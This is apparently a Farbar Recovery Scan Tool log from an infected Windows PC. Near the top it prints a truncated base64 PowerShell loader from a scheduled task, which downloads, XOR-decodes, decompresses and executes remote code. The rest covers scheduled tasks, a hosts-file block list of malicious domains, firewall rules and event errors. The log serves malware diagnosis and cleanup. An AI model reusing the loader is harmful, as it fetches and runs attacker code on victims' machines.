ZwBnAFAAWQBvAFMAaQBBAFgASgBCAGYASABlAFAAZwBfAHkAQQBvADEANQBZAGwANQBPAEgAawBLADMALQBsAGgAOQA4AGMAdQBIAHMATQBwAGQANABhAHMAOAA0AE8AWQBpAEoAagBmAFMAOQB5AGEAdwA0AHYAbwB1AHgAUABxAF8ANAAxAGMAdwBsAEEAOQA4AGEATwBmAEUAaQBkADQAaQBWAEMANABkADUATgAxAEYAdAB4AFMAOQAwAEQAQgA2ADYAWABoAHoAdABXADcANgBiAEMAagB3AHUAMQBJADAATQBUAFUANwA2AG0ANABkAFMASABJAHAAcgBLAFcANABIAGgAVABNAFYAbwB1AGYAUQBUAGcAUQBfAEsATgBWAHoAYwAwAFEAawBBAGsAbwBTAEQAZQBPADkAVABjAHkATABMADIAUwBYAGQAUwA4AE4AcwBPAEcAWABDAGoATABkADYAUQBsAFYAbgBnAFQAXwBkADkANwAyAEsARwBLAEcAXwBIAHcATQBjAE4ATQBpAFAAbwBkAEYAZwBDAHYARwB4AHEAcgBqAE4AMAB2AEsASwBjAGkAMgBtAG8AbwBqAHQAbQBqAEgAVQBIAHYAcwB1AGIAQQAwAGYAdQBaAFIAOABsAGIARABNAG4AMgBCAHkAcgB2AFUAVQBYAHIANwBkAHAAVABVAHgAagBxAHQAWgB1AE8AQQA0AE8AZwAxAE0AQgB0AEMAdgBzAGcASgBTAFgAcwBZADEAcQBOAFIATwA1AHEAegBlAFAARQBxADQARABRAFoAbABCAFMAOABaAHkAVABUAFYAbQBGAEQASgBGAEsANQBWADQARwByADYATQBMAFcATgBCADgAXwBHAGIAUgA3AGQAbgBsAG4ARgBKAHoAMgBtAGcAagBXAHkAVwBFAFoAQgBpAGwAbgBtAHQAdwBSAHoANABKAGwASgBMAGIASQAxAHgASwBRAHkAQwB1AGIAeQA2AEEATQB4AGgANQBaADYAZABBAHcAZABaAGsATABHAHMAawBQAEwAeAB5AGsAXwAxAGkAQgAyAG8AWQBJADAAZgBwAHIAdgA4AFIAMABrAEYAdwBjAE8AbQBWAFUANgBMADkARgBXAE0AdwBxAEEASwBVAEYARgBQAEIAUQBwAGUAVAAyAHAAVABUAHUAcwBTADQATgBaAFUAMABuAFkASQBpAFMANABlAGgANABnADQASQBoAHAAdwBBAHAAQgBHAEYAdgBvACYAcgA9ADQAMwA4ADMAMwAwADEANwAyADAAMAAxADkAMgA5ADUANQA5ADkAIgA7ACQAcwB0AHMAawA9ACIAewAwADgANwBFADcAOQA0ADcALQA3AEUANwBFAC0AMABDADAARgAtADAARAAxADEALQA3AEEAMAA1ADAAQgA3ADkAMQAxADcAQQB9ACIAOwAkAHAAcgBpAGQAPQAiAFMAeQBzAHQAZQBtAEgAZQBhAGwAZQByACIAOwAkAGkAbgBpAGQAPQAiAFEASQBMAEYARgBRAFEAQwAiADsAdAByAHkAewBpAGYAKAAkAFAAUwBWAGUAcgBzAGkAbwBuAFQAYQBiAGwAZQAuAFAAUwBWAGUAcgBzAGkAbwBuAC4ATQBhAGoAbwByACAALQBsAHQAIAAyACkAewBiAHIAZQBhAGsAOwB9ACQAdgA9AFsAUwB5AHMAdABlAG0ALgBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoATwBTAFYAZQByAHMAaQBvAG4ALgBWAGUAcgBzAGkAbwBuADsACgBpAGYAKAAkAHYALgBNAGEAagBvAHIAIAAtAGUAcQAgADUAKQB7AGkAZgAoACgAJAB2AC4ATQBpAG4AbwByACAALQBsAHQAIAAyACkAIAAtAEEATgBEACAAKAAoAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABXAGkAbgAzADIAXwBPAHAAZQByAGEAdABpAG4AZwBTAHkAcwB0AGUAbQApAC4AUwBlAHIAdgBpAGMAZQBQAGEAYwBrAE0AYQBqAG8AcgBWAGUAcgBzAGkAbwBuACAALQBsAHQAIAAyACkAKQB7AGIAcgBlAGEAawA7AH0AfQAKAGkAZgAoAC0ATgBPAFQAIAAoAFsAUwBlAGMAdQByAGkAdAB5AC4AUAByAGkAbgBjAGkAcABhAGwALgBXAGkAbgBkAG8AdwBzAFAAcgBpAG4AYwBpAHAAYQBsAF0AWwBTAGUAYwB1AHIAaQB0AHkALgBQAHIAaQBuAGMAaQBwAGEAbAAuAFcAaQBuAGQAbwB3AHMASQBkAGUAbgB0AGkAdAB5AF0AOgA6AEcAZQB0AEMAdQByAHIAZQBuAHQAKAApACkALgBJAHMASQBuAFIAbwBsAGUAKABbAFMAZQBjAHUAcgBpAHQAeQAuAFAAcgBpAG4AYwBpAHAAYQBsAC4AVwBpAG4AZABvAHcAcwBCAHUAaQBsAHQASQBuAFIAbwBsAGUAXQAgACIAQQBkAG0AaQBuAGkAcwB0AHIAYQB0AG8AcgAiACkAKQB7AGIAcgBlAGEAawA7AH0ACgBmAHUAbgBjAHQAaQBvAG4AIAB3AGMAKAAkAHUAcgBsACkAewAkAHIAcQA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAHIAcQAuAFUAcwBlAEQAZQBmAGEAdQBsAHQAQwByAGUAZABlAG4AdABpAGEAbABzAD0AJAB0AHIAdQBlADsAJAByAHEALgBIAGUAYQBkAGUAcgBzAC4AQQBkAGQAKAAiAHUAcwBlAHIALQBhAGcAZQBuAHQAIgAsACIATQBvAHoAaQBsAGwAYQAvADQALgAwACAAKABjAG8AbQBwAGEAdABpAGIAbABlADsAIABNAFMASQBFACAANwAuADAAOwAgAFcAaQBuAGQAbwB3AHMAIABOAFQAIAA2AC4AMQA7ACkAIgApADsAcgBlAHQAdQByAG4AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAcgBxAC4ARABvAHcAbgBsAG8AYQBkAEQAYQB0AGEAKAAkAHUAcgBsACkAKQA7AH0ACgBmAHUAbgBjAHQAaQBvAG4AIABkAHMAdAByACgAJAByAGEAdwBkAGEAdABhACkAewAkAGIAdAA9AFsAQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJAByAGEAdwBkAGEAdABhACkAOwAkAGUAeAB0AD0AJABiAHQAWwAwAF0AOwAkAGsAZQB5AD0AJABiAHQAWwAxAF0AIAAtAGIAeABvAHIAIAAxADcAMAA7AGYAbwByACgAJABpAD0AMgA7ACQAaQAgAC0AbAB0ACAAJABiAHQALgBMAGUAbgBnAHQAaAA7ACQAaQArACsAKQB7ACQAYgB0AFsAJABpAF0APQAoACQAYgB0AFsAJABpAF0AIAAtAGIAeABvAHIAIAAoACgAJABrAGUAeQAgACsAIAAkAGkAKQAgAC0AYgBhAG4AZAAgADIANQA1ACkAKQA7AH0ACgByAGUAdAB1AHIAbgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBEAGUAZgBsAGEAdABlAFMAdAByAGUAYQBtACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AKAAkAGIAdAAsADIALAAoACQAYgB0AC4ATABlAG4AZwB0AGgALQAkAGUAeAB0ACkAKQApACwAWwBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ATQBvAGQAZQBdADoAOgBEAGUAYwBvAG0AcAByAGUAcwBzACkAKQApAC4AUgBlAGEAZABUAG8ARQBuAGQAKAApADsAfQAKACQAcwBjAD0AZABzAHQAcgAoAHcAYwAoACQAcwB1AHIAbAApACkAOwBJAG4AdgBvAGsAZQAtAEUAeABwAHIAZQBzAHMAaQBvAG4AIAAtAGMAbwBtAG0AYQBuAGQAIAAiACQAcwBjACIAOwB9AGMAYQB0AGMAaAB7AH0AOwBlAHgAaQB0ACAAMAA7AA==
Task: {7333FDBC-0E4E-4384-9617-90C259152ADF} - System32\Tasks\Start PC Reviver for Liljoethemaster@Liljoe3493(logon) => C:\Program Files\ReviverSoft\PC Reviver\PC Reviver.exe
Task: {756FF580-9E19-4DD9-935F-352BA78AF78E} - System32\Tasks\Microsoft_MKC_Logon_Task_itype.exe => c:\Program Files\Microsoft Mouse and Keyboard Center\itype.exe [2015-07-08] (Microsoft Corporation)
Task: {7E1DB53B-F000-42C9-8720-D1578D0E957E} - System32\Tasks\Start PC Reviver Schedule => C:\Program Files\ReviverSoft\PC Reviver\PC Reviver.exe
Task: {90A34C84-2277-456B-9460-4E533523F523} - \bvxvaxxvyd -> No File <==== ATTENTION
Task: {9262E4B9-052C-4A71-B1C6-F6CFFC0823A7} - System32\Tasks\HPCeeScheduleForLiljoe3493 => C:\Program Files (x86)\Hewlett-Packard\HP Ceement\HPCEE.exe [2015-06-16] (Hewlett-Packard)
Task: {97926E65-9D5E-4350-A595-2BDD676F1269} - System32\Tasks\Hewlett-Packard\HP Active Health\HP Active Health Scan (HPSA) => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPActiveHealth\ActiveHealth.exe [2015-11-04] (Hewlett-Packard)
Task: {9F2D0461-751D-49DD-9820-47C4CEA53FC4} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-1412126346-3748250155-1825200208-1001Core => C:\Users\Liljoe3493\AppData\Local\Google\Update\GoogleUpdate.exe
Task: {A88FE014-BC68-480F-9AD8-53197DFC17E0} - System32\Tasks\Start PC Reviver with delay for Liljoethemaster@Liljoe3493 => C:\Program Files\ReviverSoft\PC Reviver\PC Reviver.exe
Task: {AFDD49AA-F872-46B7-A58F-98DEF2013914} - System32\Tasks\SUPERAntiSpyware Scheduled Task ea76e74c-ab88-4c06-b5b8-3904632bc604 => C:\Program Files\SUPERAntiSpyware\SASTask.exe [2013-11-07] (SUPERAdBlocker.com)
Task: {B17C3E42-8098-4C37-AD68-B0EF4A899D5F} - System32\Tasks\Apple\AppleSoftwareUpdate => C:\Program Files (x86)\Apple Software Update\SoftwareUpdate.exe [2015-08-26] (Apple Inc.)
Task: {B8FE7DEC-41F0-4ED3-80E5-F84243D5EDEC} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-10-25] (Google Inc.)
Task: {BA48FCCD-F364-42BF-B684-E7B4DCC4D3D1} - System32\Tasks\Microsoft\Windows\UPnP\UPnPHostConfig => config upnphost start= auto
Task: {C22640B2-3847-4228-9265-43313B47830A} - System32\Tasks\Start PC Reviver Update => C:\Program Files\ReviverSoft\PC Reviver\PC Reviver.exe
Task: {C38FAC2B-F78D-4494-BDDD-BAADEF0E001C} - System32\Tasks\TuneUpUtilities_Task_BkGndMaintenance2013 => C:\Program Files (x86)\AVG\AVG PC TuneUp\OneClick.exe
Task: {C646A1FD-AFE7-4925-8811-AAD0567020F1} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Assistant Quick Start => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF.exe [2015-09-28] (Hewlett-Packard Company)
Task: {C65F0B9C-6699-47DA-96A9-F172DA7C4A38} - \RealTimes (32-bit)  -> No File <==== ATTENTION
Task: {C77A8844-9428-4F69-8918-DA0A3FBBF767} - System32\Tasks\SafeZone scheduled Autoupdate 1451901358 => C:\Program Files\AVAST Software\SZBrowser\launcher.exe
Task: {C87AEDCE-F466-43B8-9580-F9EE6317046D} - System32\Tasks\Microsoft OneDrive Auto Update Task-S-1-5-21-1412126346-3748250155-1825200208-1001 => C:\Users\Joseph\AppData\Local\Microsoft\OneDrive\OneDrive.exe
Task: {D200501E-39E8-45CA-AAF3-42C669EAE744} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-10-25] (Google Inc.)
Task: {D23860EE-E8D0-4244-9883-95C2FAE1A5DD} - System32\Tasks\SUPERAntiSpyware Scheduled Task f4ed902d-2bcc-4077-b392-aaba5eb3e6f7 => C:\Program Files\SUPERAntiSpyware\SASTask.exe [2013-11-07] (SUPERAdBlocker.com)
Task: {DDB6D5E0-813C-4E7D-A051-4C8BBB375E04} - System32\Tasks\Microsoft_Hardware_Launch_mousekeyboardcenter_exe => c:\Program Files\Microsoft Mouse and Keyboard Center\mousekeyboardcenter.exe [2015-07-08] (Microsoft)
Task: {DF82BD02-BE26-4273-B9E0-3C0B1C4D83DB} - System32\Tasks\RealDownloaderRealUpgradeScheduledTaskS-1-5-21-1412126346-3748250155-1825200208-1002 => C:\Program Files (x86)\RealNetworks\RealDownloader\realupgrade.exe [2015-11-04] (RealNetworks, Inc.)
Task: {E0C1D9FC-DC87-40F7-9887-6850331911D8} - System32\Tasks\AVAST Software\Avast settings backup => C:\Program Files\Common Files\AV\avast! Antivirus\backup.exe [2016-01-04] (AVAST Software)
Task: {F92C26AD-7E33-483D-933E-96954EF90975} - System32\Tasks\AVGPCTuneUp_Task_BkGndMaintenance => C:\Program Files (x86)\AVG\AVG PC TuneUp\tuscanx.exe
Task: {FF147E37-AED9-45F9-979F-900ADB255A87} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-1412126346-3748250155-1825200208-1001UA => C:\Users\Liljoe3493\AppData\Local\Google\Update\GoogleUpdate.exe
 
(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)
 
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-1412126346-3748250155-1825200208-1001Core.job => C:\Users\Liljoe3493\AppData\Local\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-1412126346-3748250155-1825200208-1001UA.job => C:\Users\Liljoe3493\AppData\Local\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\HPCeeScheduleForLiljoe3493.job => C:\Program Files (x86)\Hewlett-Packard\HP Ceement\HPCEE.exe
Task: C:\Windows\Tasks\HPCeeScheduleForLILJOETHEMASTER$.job => C:\Program Files (x86)\Hewlett-Packard\HP Ceement\HPCEE.exe
Task: C:\Windows\Tasks\Start PC Reviver for Liljoethemaster@Liljoe3493(logon).job => C:\Program Files\ReviverSoft\PC Reviver\PC Reviver.exe
Task: C:\Windows\Tasks\Start PC Reviver with delay for Liljoethemaster@Liljoe3493.job => C:\Program Files\ReviverSoft\PC Reviver\PC Reviver.exe
Task: C:\Windows\Tasks\SUPERAntiSpyware Scheduled Task 0e5ae95f-73dd-4db3-b20f-59643e5fb995.job => C:\Program Files\SUPERAntiSpyware\SASTask.exedC:\Program Files\SUPERAntiSpyware\SUPERANTISPYWARE.EXE
Task: C:\Windows\Tasks\SUPERAntiSpyware Scheduled Task ea76e74c-ab88-4c06-b5b8-3904632bc604.job => C:\Program Files\SUPERAntiSpyware\SASTask.exedC:\Program Files\SUPERAntiSpyware\SUPERANTISPYWARE.EXE
Task: C:\Windows\Tasks\SUPERAntiSpyware Scheduled Task f4ed902d-2bcc-4077-b392-aaba5eb3e6f7.job => C:\Program Files\SUPERAntiSpyware\SASTask.exedC:\Program Files\SUPERAntiSpyware\SUPERANTISPYWARE.EXE
 
==================== Shortcuts =============================
 
(The entries could be listed to be restored or removed.)
 
==================== Loaded Modules (Whitelisted) ==============
 
2015-01-20 22:35 - 2015-01-20 22:35 - 00085832 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\zlib1.dll
2015-10-13 04:45 - 2015-10-13 04:45 - 01328912 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\libxml2.dll
2015-11-04 15:20 - 2015-11-04 15:20 - 00033088 _____ () C:\Program Files (x86)\Real\UpdateService\RealPlayerUpdateSvc.exe
2015-01-29 19:38 - 2014-04-14 07:28 - 00223624 _____ () C:\Program Files (x86)\Ashampoo\Ashampoo WinOptimizer 11\LiveTunerService.exe
2016-01-04 19:59 - 2016-01-04 19:58 - 00168336 _____ () C:\Program Files (x86)\Common Files\AVG Secure Search\vToolbarUpdater\19.1.0\loggingserver.exe
2016-01-04 19:59 - 2016-01-04 19:59 - 02573712 _____ () C:\Program Files (x86)\AVG SafeGuard toolbar\vprot.exe
2015-11-04 15:20 - 2015-11-04 15:20 - 00037720 _____ () C:\Program Files (x86)\Real\UpdateService\DL2UpdatePlugin.dll
2015-11-04 15:19 - 2015-11-04 15:19 - 00039768 _____ () C:\Program Files (x86)\Real\UpdateService\RealDownloaderUpdatePlugin.dll
2015-11-04 15:20 - 2015-11-04 15:20 - 00037728 _____ () C:\Program Files (x86)\Real\UpdateService\VideoDLUpdatePlugin.dll
2016-01-04 20:00 - 2016-01-04 19:59 - 00528272 _____ () C:\Program Files (x86)\Common Files\AVG Secure Search\vToolbarUpdater\19.1.0\log4cplusU.dll
2015-12-16 19:53 - 2015-12-10 21:54 - 01583432 _____ () C:\program files (x86)\Google\Chrome\Application\47.0.2526.106\libglesv2.dll
2015-12-16 19:53 - 2015-12-10 21:54 - 00081224 _____ () C:\program files (x86)\Google\Chrome\Application\47.0.2526.106\libegl.dll
 
==================== Alternate Data Streams (Whitelisted) =========
 
(If an entry is included in the fixlist, only the ADS will be removed.)
 
AlternateDataStreams: C:\Windows\system32\Drivers\sdfhgdf.sys:{c20e1123-aee0-11e5-82d5-3863bbc8f23e}
AlternateDataStreams: C:\Windows\system32\Drivers\sdfhgdf.sys:{c20e1124-aee0-11e5-82d5-3863bbc8f23e}
 
==================== Safe Mode (Whitelisted) ===================
 
(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)
 
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MBAMSwissArmy => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\mcpltsvc => ""=""
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MBAMSwissArmy => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mcpltsvc => ""=""
 
==================== EXE Association (Whitelisted) ===============
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed.)
 
 
==================== Internet Explorer trusted/restricted ===============
 
(If an entry is included in the fixlist, it will be removed from the registry.)
 
IE restricted site: HKU\.DEFAULT\...\007guard.com -> install.007guard.com
IE restricted site: HKU\.DEFAULT\...\008i.com -> 008i.com
IE restricted site: HKU\.DEFAULT\...\008k.com -> www.008k.com
IE restricted site: HKU\.DEFAULT\...\00hq.com -> www.00hq.com
IE restricted site: HKU\.DEFAULT\...\010402.com -> 010402.com
IE restricted site: HKU\.DEFAULT\...\032439.com -> 80gw6ry3i3x3qbrkwhxhw.032439.com
IE restricted site: HKU\.DEFAULT\...\0scan.com -> www.0scan.com
IE restricted site: HKU\.DEFAULT\...\1-2005-search.com -> www.1-2005-search.com
IE restricted site: HKU\.DEFAULT\...\1-domains-registrations.com -> www.1-domains-registrations.com
IE restricted site: HKU\.DEFAULT\...\1000gratisproben.com -> www.1000gratisproben.com
IE restricted site: HKU\.DEFAULT\...\1001namen.com -> www.1001namen.com
IE restricted site: HKU\.DEFAULT\...\100888290cs.com -> mir.100888290cs.com
IE restricted site: HKU\.DEFAULT\...\100sexlinks.com -> www.100sexlinks.com
IE restricted site: HKU\.DEFAULT\...\10sek.com -> www.10sek.com
IE restricted site: HKU\.DEFAULT\...\12-26.net -> user1.12-26.net
IE restricted site: HKU\.DEFAULT\...\12-27.net -> user1.12-27.net
IE restricted site: HKU\.DEFAULT\...\123fporn.info -> www.123fporn.info
IE restricted site: HKU\.DEFAULT\...\123haustiereundmehr.com -> www.123haustiereundmehr.com
IE restricted site: HKU\.DEFAULT\...\123moviedownload.com -> www.123moviedownload.com
IE restricted site: HKU\.DEFAULT\...\123simsen.com -> www.123simsen.com
 
There are 7866 more sites.
 
 
==================== Hosts content: ==========================
 
(If needed Hosts: directive could be included in the fixlist to reset Hosts.)
 
2013-08-22 07:25 - 2016-01-04 09:13 - 00450771 ____R C:\Windows\system32\Drivers\etc\hosts
 
127.0.0.1 www.007guard.com
127.0.0.1 007guard.com
127.0.0.1 008i.com
127.0.0.1 www.008k.com
127.0.0.1 008k.com
127.0.0.1 www.00hq.com
127.0.0.1 00hq.com
127.0.0.1 010402.com
127.0.0.1 www.032439.com
127.0.0.1 032439.com
127.0.0.1 www.0scan.com
127.0.0.1 0scan.com
127.0.0.1 1000gratisproben.com
127.0.0.1 www.1000gratisproben.com
127.0.0.1 1001namen.com
127.0.0.1 www.1001namen.com
127.0.0.1 100888290cs.com
127.0.0.1 www.100888290cs.com
127.0.0.1 www.100sexlinks.com
127.0.0.1 100sexlinks.com
127.0.0.1 10sek.com
127.0.0.1 www.10sek.com
127.0.0.1 www.1-2005-search.com
127.0.0.1 1-2005-search.com
127.0.0.1 123fporn.info
127.0.0.1 www.123fporn.info
127.0.0.1 123haustiereundmehr.com
127.0.0.1 www.123haustiereundmehr.com
127.0.0.1 123moviedownload.com
127.0.0.1 www.123moviedownload.com
 
There are 15463 more lines.
 
 
==================== Other Areas ============================
 
(Currently there is no automatic fix for this section.)
 
DNS Servers: 75.75.75.75 - 75.75.76.76
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Windows Firewall is enabled.
 
==================== MSCONFIG/TASK MANAGER disabled items ==
 
(Currently there is no automatic fix for this section.)
 
HKLM\...\StartupApproved\StartupFolder: => "RealTimes.lnk"
HKLM\...\StartupApproved\Run: => "iTunesHelper"
HKLM\...\StartupApproved\Run: => "InstallerLauncher"
HKLM\...\StartupApproved\Run32: => "SunJavaUpdateSched"
HKLM\...\StartupApproved\Run32: => "BlueStacks Agent"
HKLM\...\StartupApproved\Run32: => "QuickTime Task"
HKLM\...\StartupApproved\Run32: => "TkBellExe"
HKLM\...\StartupApproved\Run32: => "RealDownloader"
 
==================== FirewallRules (Whitelisted) ===============
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
FirewallRules: [vm-monitoring-nb-session] => (Allow) LPort=139
FirewallRules: [{48E95D83-9B8B-414B-A9A7-2AFD0BA50208}] => (Allow) C:\Program Files (x86)\Windows Live\Contacts\wlcomm.exe
FirewallRules: [{F82BB814-FD51-4987-A33F-250BD832B780}] => (Allow) LPort=2869
FirewallRules: [{819306FA-D122-44F5-A748-CC1307C44A50}] => (Allow) LPort=1900
FirewallRules: [{2CE914CC-1246-4A45-9164-021ADBEB0FA6}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{6B4F92E4-BA5A-417A-9AB8-873D471F6AF6}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{D8E0C8F5-5D2A-4C08-B909-61E4F0E4597A}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{5F135936-FF5E-4092-A1E2-3979F383BCA2}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{39600119-24BB-49F0-9683-6C14A5BDE659}] => (Allow) C:\Users\Liljoe3493\AppData\Roaming\uTorrent\uTorrent.exe
FirewallRules: [{80AD684B-DFE2-4317-A34A-372A855B9298}] => (Allow) C:\Users\Liljoe3493\AppData\Roaming\uTorrent\uTorrent.exe
FirewallRules: [{D158A772-4995-43F6-861D-531CBA1F2A6C}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [TCP Query User{6B3E0170-EF4A-4615-B7F7-1ED4C22198A4}C:\program files (x86)\skype\phone\skype.exe] => (Allow) C:\program files (x86)\skype\phone\skype.exe
FirewallRules: [UDP Query User{38265C65-A41E-49B3-9DEA-039CF0ED162D}C:\program files (x86)\skype\phone\skype.exe] => (Allow) C:\program files (x86)\skype\phone\skype.exe
FirewallRules: [{B1F1BC02-998F-4770-B9EE-AD6912C18E1A}] => (Allow) C:\Program Files (x86)\CyberLink\PowerDVD12\PowerDVD12.exe
FirewallRules: [{8842EB2E-6586-4654-BFC7-D9F3406E3DFD}] => (Allow) C:\Program Files (x86)\CyberLink\PowerDVD12\Kernel\DMS\CLMSServerPDVD12.exe
FirewallRules: [{8DAA89CF-365F-4128-9147-DECEBFFE46F9}] => (Allow) C:\Program Files (x86)\CyberLink\PowerDVD12\PowerDVD12ML.exe
FirewallRules: [{E249F174-19A3-4554-B6A9-1D7C43456542}] => (Allow) C:\Program Files (x86)\CyberLink\PowerDVD12\Movie\PowerDVD.exe
FirewallRules: [{F663A0B3-08AB-4FFF-862B-5003B4913D2F}] => (Allow) C:\Games\Outlast\Binaries\Win32\OLGame.exe
FirewallRules: [{EF7E6259-2266-4C8C-881A-A61444387BC5}] => (Allow) C:\Games\Outlast\Binaries\Win32\OLGame.exe
FirewallRules: [{0F319C39-45BE-4D8D-85F3-59AF18DEBE5C}] => (Allow) C:\Games\Outlast\Binaries\Win64\OLGame.exe
FirewallRules: [{FC5C78A2-2B51-4858-A7DE-C007C5461732}] => (Allow) C:\Games\Outlast\Binaries\Win64\OLGame.exe
FirewallRules: [{E62CFC47-A8BB-4CB4-9347-DD6AC5154D5B}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{FB37B93D-133E-4EA1-9CC0-97801A9C33AB}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{9032C82C-F7D8-408B-AD11-3218F737F945}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{86388C6B-A1E2-439B-86DB-0E76730966D1}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [TCP Query User{34D62A68-902A-4D27-8331-87B666381691}C:\program files (x86)\skype\phone\skype.exe] => (Allow) C:\program files (x86)\skype\phone\skype.exe
FirewallRules: [UDP Query User{52D0E7B8-5AF1-492A-B45D-59BC934C50EB}C:\program files (x86)\skype\phone\skype.exe] => (Allow) C:\program files (x86)\skype\phone\skype.exe
FirewallRules: [TCP Query User{0278734D-4D07-45FA-B8CB-9249B04B1B76}C:\games\outlast\binaries\win64\olgame.exe] => (Allow) C:\games\outlast\binaries\win64\olgame.exe
FirewallRules: [UDP Query User{39DAA998-DF47-4BFF-968C-C65E753EC4CC}C:\games\outlast\binaries\win64\olgame.exe] => (Allow) C:\games\outlast\binaries\win64\olgame.exe
FirewallRules: [{7CFF04A5-2187-4171-87BC-E54B44C24F40}] => (Allow) c:\program files (x86)\real\realplayer\RPDS\Bin\rpdsvc.exe
FirewallRules: [{BD2B6BA2-20B2-4908-820C-63D91CFA2072}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{3049E11B-BA35-4F79-8E81-209E7F470A85}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{405C307D-4320-4110-8034-9EDE9F2E558C}] => (Allow) C:\Program Files\iTunes\iTunes.exe
FirewallRules: [{6A05F313-82CA-4649-8069-BB5F2662B8A0}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
 
==================== Restore Points =========================
 
04-01-2016 01:42:26 Removed XSplit Broadcaster
04-01-2016 01:44:40 Removed XSplit Broadcaster
04-01-2016 01:56:58 Removed XSplit Broadcaster
04-01-2016 02:22:56 Restore Operation
04-01-2016 10:22:03 Removed Mumble 1.2.10
 
==================== Faulty Device Manager Devices =============
 
 
==================== Event log errors: =========================
 
Application errors:
==================
Error: (01/04/2016 12:11:51 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: The program Skype.exe version 7.17.0.105 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Action Center control panel.
 
Process ID: 6b24
 
Start Time: 01d1471a3d28f31c
 
Termination Time: 4294967295
 
Application Path: C:\Program Files (x86)\Skype\Phone\Skype.exe
 
Report Id: 98ad604c-b30e-11e5-82e2-3863bbc8f23e
 
Faulting package full name: 
 
Faulting package-relative application ID:
 
Error: (01/04/2016 11:57:51 AM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: LILJOETHEMASTER)
Description: Activation of app Microsoft.SkypeApp_kzf8qxf38zg5c!App failed with error: -2144927142 See the Microsoft-Windows-TWinUI/Operational log for additional information.
 
Error: (01/04/2016 11:57:50 AM) (Source: Application Hang) (EventID: 1002) (User: )
Description: The program wwahost.exe version 6.3.9600.17415 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Action Center control panel.
 
Process ID: 6a94
 
Start Time: 01d147195ed008df
 
Termination Time: 4294967295
 
Application Path: C:\Windows\syswow64\wwahost.exe
 
Report Id: a67702a2-b30c-11e5-82e2-3863bbc8f23e
 
Faulting package full name: Microsoft.SkypeApp_3.1.0.1016_x86__kzf8qxf38zg5c
 
Faulting package-relative application ID: App
 
Error: (01/04/2016 11:57:41 AM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 2486) (User: LILJOETHEMASTER)
Description: App Microsoft.SkypeApp_3.1.0.1016_x86__kzf8qxf38zg5c+App did not launch within its allotted time.
 
Error: (01/04/2016 10:23:54 AM) (Source: MsiInstaller) (EventID: 10005) (User: LILJOETHEMASTER)
